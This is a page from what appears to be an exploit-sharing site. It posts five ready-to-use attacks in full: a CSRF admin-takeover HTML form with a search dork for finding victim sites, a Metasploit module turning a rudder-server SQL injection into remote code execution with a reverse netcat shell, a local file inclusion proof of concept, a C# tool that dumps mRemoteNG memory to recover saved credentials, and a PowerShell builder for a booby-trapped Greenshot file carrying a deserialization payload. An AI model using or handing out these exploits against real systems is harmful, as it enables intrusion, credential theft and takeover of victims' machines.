Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : CMSUsina V2.2.3 CSRF Add Admin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : http://www.ysy.com.br/ | | # Dork : "Desenvolvido por Usina da Criação" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code Edit admin . [+] Go to the line 3. [+] Set the target site link Save changes and apply . [+] infected file : site/adm/user.php. [+] http://127.0.0.1/site/adm/user.php [+] save code as poc.html . Alterar seus dados de acesso <fieldset><legend>ALTERAR DADOS</legend> <form name="editsenha" method="post" action="http://rcborgesconstrutoracombr/site/adm/user.php?acao=edit"> <label>Usu&aacute;rio</label> <input type="text" name="login" value="." maxlength="14" size="70" /> <label> Confirmar usu&aacute;rio</label> <input type="text" name="login2" value="." maxlength="14" size="70" /> <label>Senha</label> <input type="password" name="senha" value="." maxlength="14" size="70" /> <label>Confirmar senha</label> <input type="password" name="senha2" value="." maxlength="14" size="70" /> <input type="submit" name="submit" value="Alterar senha" /> </form> </fieldset>  </div> </td> </tr> </table> </body> </html> Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Rudder Server SQLI Remote Code Execution', 'Description' => %q{ This Metasploit module exploits a SQL injection vulnerability in RudderStack's rudder-server, an open source Customer Data Platform (CDP). The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1. By exploiting this flaw, an attacker can execute arbitrary SQL commands, which may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgreSQL having superuser permissions by default. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <egebalci@pm.me>' # msf module ], 'References' => [ ['CVE', '2023-30625'], ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'], ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5 }, 'Platform' => [ 'unix', 'linux' ], 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'Unix Command', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], # Due to the insufficient build instructions for Windows platforms, no testing were done on this platform. # As a result, the target is disabled in this exploit module. # [ # 'Windows Command', # { # 'Platform' => 'win', # 'Arch' => ARCH_CMD, # 'Type' => :win_cmd, # 'DefaultOptions' => { # 'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat' # } # } # ], ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2023-06-16', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']), ] ) end def check version = get_version return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown' if Rex::Version.new('1.3.0-rc.1') > Rex::Version.new(version.gsub('v', '')) return Exploit::CheckCode::Appears("Rudder Version: #{version}") end Exploit::CheckCode::Safe end def get_version return @get_version if @get_version res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'version') ) if res && res.code == 200 @get_version = res.get_json_document['Version'] if @get_version.empty? @get_version = 'Unknown' end @get_version end end def exploit print_status "Detected rudder version: #{get_version}" # If not 'Auto' then use the selected version case target['Type'] # when :win_cmd # shell = 'cmd.exe' when :unix_cmd shell = 'bash' else fail_with(Failure::BadConfig, 'Please select a valid target') end data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}" print_status 'Triggering RCE via crafted SQL query...' send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'), 'ctype' => 'application/json', 'data' => data }) end end </code></pre>

<pre><code>======================================================================================================== | # Title : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html | | # Dork : "Powerful bitcoin and cryptocurrency tools & tickers." | ======================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] infected file : index.php line 4 : require_once('includes/templates/' . $website['template'] . '/header.php'); [+] http://localhost/btcon/index.php?website['template'] = evil Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code># Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory # Google Dork: - # Date: 21.07.2023 # Exploit Author: Maximilian Barz # Vendor Homepage: https://mremoteng.org/ # Software Link: https://mremoteng.org/download # Version: mRemoteNG <= v1.77.3.1784-NB # Tested on: Windows 11 # CVE : CVE-2023-30367 /* Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory. Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper */ using System; using System.Collections; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; namespace mRemoteNGDumper { public static class Program { public enum MINIDUMP_TYPE { MiniDumpWithFullMemory = 0x00000002 } [StructLayout(LayoutKind.Sequential, Pack = 4)] public struct MINIDUMP_EXCEPTION_INFORMATION { public uint ThreadId; public IntPtr ExceptionPointers; public int ClientPointers; } [DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("Dbghelp.dll")] static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); static void Main(string[] args) { string input; bool configfound = false; StringBuilder filesb; StringBuilder linesb; List<string> configs = new List<string>(); Process[] localByName = Process.GetProcessesByName("mRemoteNG"); if (localByName.Length == 0) { Console.WriteLine("[-] No mRemoteNG process was found. Exiting"); System.Environment.Exit(1); } string assemblyPath = Assembly.GetEntryAssembly().Location; Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id); string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp"; FileStream procdumpFileStream = File.Create(dumpFileName); MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION(); // A full memory dump is necessary in the case of a managed application, other wise no information // regarding the managed code will be available MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory; MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero); procdumpFileStream.Close(); filesb = new StringBuilder(); Console.WriteLine("[+] Searching for configuration files in memory dump."); using (StreamReader reader = new StreamReader(dumpFileName)) { while (reader.Peek() >= 0) { input = reader.ReadLine(); string pattern = @"(\<Node)(.*)(?=\/>)\/>"; Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase); if (m.Success) { configfound = true; foreach (string config in m.Value.Split('>')) { configs.Add(config); } } } reader.Close(); if (configfound) { string currentDir = System.IO.Directory.GetCurrentDirectory(); string dumpdir = currentDir + "/dump"; if (!Directory.Exists(dumpdir)) { Directory.CreateDirectory(dumpdir); } string savefilepath; for (int i =0; i < configs.Count;i++) { if (!string.IsNullOrEmpty(configs[i])) { savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml"; Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath); using (StreamWriter writer = new StreamWriter(savefilepath)) { writer.Write(configs[i]+'>'); writer.Close(); } } } Console.WriteLine("[+] Done!"); Console.WriteLine("[+] Deleting memorydump file!"); File.Delete(dumpFileName); Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" ); } else { Console.WriteLine("[-] No configuration file found in memorydump. Exiting"); Console.WriteLine("[+] Deleting memorydump file!"); File.Delete(dumpFileName); } } } } } </code></pre>

<pre><code># Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution # Date: 26/07/2023 # Exploit Author: p4r4bellum # Vendor Homepage: https://getgreenshot.org # Software Link: https://getgreenshot.org/downloads/ # Version: 1.2.6.10 # Tested on: windows 10.0.19045 N/A build 19045 # CVE : CVE-2023-34634 # # GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format # A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software # On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file # will lead to arbitrary code execution # # Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw #load the payload $payload = Get-Content .\payload.bin -Encoding Byte # retrieve the length of the payload $length = $payload.Length # load the required assembly to craft a PNG file Add-Type -AssemblyName System.Drawing # the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell $filename = "$home\poc.greenshot" $bmp = new-object System.Drawing.Bitmap 250,61 $font = new-object System.Drawing.Font Consolas,24 $brushBg = [System.Drawing.Brushes]::Green $brushFg = [System.Drawing.Brushes]::Black $graphics = [System.Drawing.Graphics]::FromImage($bmp) $graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height) $graphics.DrawString('POC Greenshot',$font,$brushFg,10,10) $graphics.Dispose() $bmp.Save($filename) # append the payload to the PNG file $payload | Add-Content -Path $filename -Encoding Byte -NoNewline # append the length of the payload [System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline # append the signature "Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii # launch greenshot. Calc.exe should be executed Invoke-Item $filename </code></pre>